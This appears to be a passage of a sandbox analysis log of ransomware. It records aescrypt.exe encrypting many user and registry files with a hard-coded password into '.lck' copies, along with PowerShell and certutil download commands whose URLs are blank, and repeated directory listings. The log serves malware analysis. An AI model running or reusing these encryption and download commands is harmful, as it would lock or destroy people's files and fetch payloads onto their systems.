C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
3⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DenyInstall.eps.lck" "DenyInstall.eps"
3⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FormatSend.crw.lck" "FormatSend.crw"
3⤵
- Modifies extensions of user files
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StartTest.emf.lck" "StartTest.emf"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OpenEnter.tif.lck" "OpenEnter.tif"
3⤵
- Modifies extensions of user files
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UndoRead.eps.lck" "UndoRead.eps"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SplitConfirm.dib.lck" "SplitConfirm.dib"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WaitResize.dwg.lck" "WaitResize.dwg"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockNew.dxf.lck" "UnlockNew.dxf"
3⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeDisconnect.dib.lck" "InvokeDisconnect.dib"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BlockWrite.cr2.lck" "BlockWrite.cr2"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExportGroup.png.lck" "ExportGroup.png"
3⤵
- Modifies extensions of user files
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RenameConnect.tif.lck" "RenameConnect.tif"
3⤵
- Modifies extensions of user files
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnblockUnlock.dxf.lck" "UnblockUnlock.dxf"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchRename.png.lck" "WatchRename.png"
3⤵
- Modifies extensions of user files
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EnterRequest.raw.lck" "EnterRequest.raw"
3⤵
- Modifies extensions of user files
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ConvertSplit.wmf.lck" "ConvertSplit.wmf"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindAdd.png.lck" "FindAdd.png"
3⤵
- Modifies extensions of user files
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "AssertReset.pcx.lck" "AssertReset.pcx"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisconnectMeasure.tiff.lck" "DisconnectMeasure.tiff"
3⤵
- Modifies extensions of user files
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "TraceCompress.svgz.lck" "TraceCompress.svgz"
3⤵
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
PID:1780

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:1112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchComplete.mov.lck" "SearchComplete.mov"
3⤵
PID:932

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InstallAssert.dwg.lck" "InstallAssert.dwg"
3⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GroupOptimize.wmx.lck" "GroupOptimize.wmx"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RedoImport.DVR.lck" "RedoImport.DVR"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "LockRemove.php.lck" "LockRemove.php"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeJoin.wps.lck" "ResumeJoin.wps"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GetRestore.ppt.lck" "GetRestore.ppt"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExportDisconnect.ocx.lck" "ExportDisconnect.ocx"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CompleteReset.vst.lck" "CompleteReset.vst"
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EnableClose.mov.lck" "EnableClose.mov"
3⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveInvoke.wmf.lck" "MoveInvoke.wmf"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnblockUnlock.xml.lck" "UnblockUnlock.xml"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "JoinInvoke.xsl.lck" "JoinInvoke.xsl"
3⤵
PID:872

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StopJoin.search-ms.lck" "StopJoin.search-ms"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RepairRedo.asp.lck" "RepairRedo.asp"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ConnectUpdate.htm.lck" "ConnectUpdate.htm"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExitCheckpoint.nfo.lck" "ExitCheckpoint.nfo"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MeasureOptimize.tif.lck" "MeasureOptimize.tif"
3⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchExport.odt.lck" "SwitchExport.odt"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GetTest.mp4.lck" "GetTest.mp4"
3⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnpublishUnregister.xml.lck" "UnpublishUnregister.xml"
3⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableFind.svg.lck" "DisableFind.svg"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveGet.dll.lck" "ApproveGet.dll"
3⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseMount.hta.lck" "CloseMount.hta"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveStop.inf.lck" "MoveStop.inf"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "JoinFind.dotm.lck" "JoinFind.dotm"
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.docx.lck" "SwitchOut.docx"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StartOut.mp3.lck" "StartOut.mp3"
3⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnregisterRemove.3gp.lck" "UnregisterRemove.3gp"
3⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RegisterShow.html.lck" "RegisterShow.html"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindOut.wm.lck" "FindOut.wm"
3⤵
PID:1972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnpublishClose.xlsx.lck" "UnpublishClose.xlsx"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UpdateSkip.nfo.lck" "UpdateSkip.nfo"
3⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:1040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:752

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:1948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ntuser.ini.lck" "ntuser.ini"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "deployment.properties.lck" "deployment.properties"
3⤵
PID:1112

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
3⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
3⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT.lck" "NTUSER.DAT"
3⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:872

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:1744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1532

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
